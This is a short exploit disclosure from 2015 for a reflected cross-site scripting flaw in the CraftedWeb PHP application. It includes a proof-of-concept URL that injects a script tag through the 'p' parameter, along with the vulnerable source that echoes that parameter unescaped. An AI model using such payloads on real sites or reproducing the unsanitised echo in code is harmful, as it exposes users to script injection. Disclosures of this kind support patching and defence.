# Exploit Title: CraftedWeb Cross Site Scripting
# Google Dork: NA
# Date: 2015-10-06
# Exploit Author: M.r00t3x
# Vendor Homepage: https://github.com/zze/CraftedWeb
# Software Link: https://codeload.github.com/zze/CraftedWeb/zip/master
# Tested on: Windows xp
reflected Xss
http://127.0.0.1/CraftedWeb-master/index.php?p=</title>1<ScRiPt>alert('xss')</ScRiPt>
source :
echo $website_title .' - ';
while ($page_title = current($GLOBALS['core_pages']))
{
if ($page_title == $_GET['p'].'.php')
{
echo key($GLOBALS['core_pages']);
$foundPT = true;
}
next($GLOBALS['core_pages']);
}
if(!isset($foundPT))
echo ucfirst($_GET['p']);
facebook page : wwww.fb.com/algeria.anon
Thanks : M.tucX - MrDz -MadGuko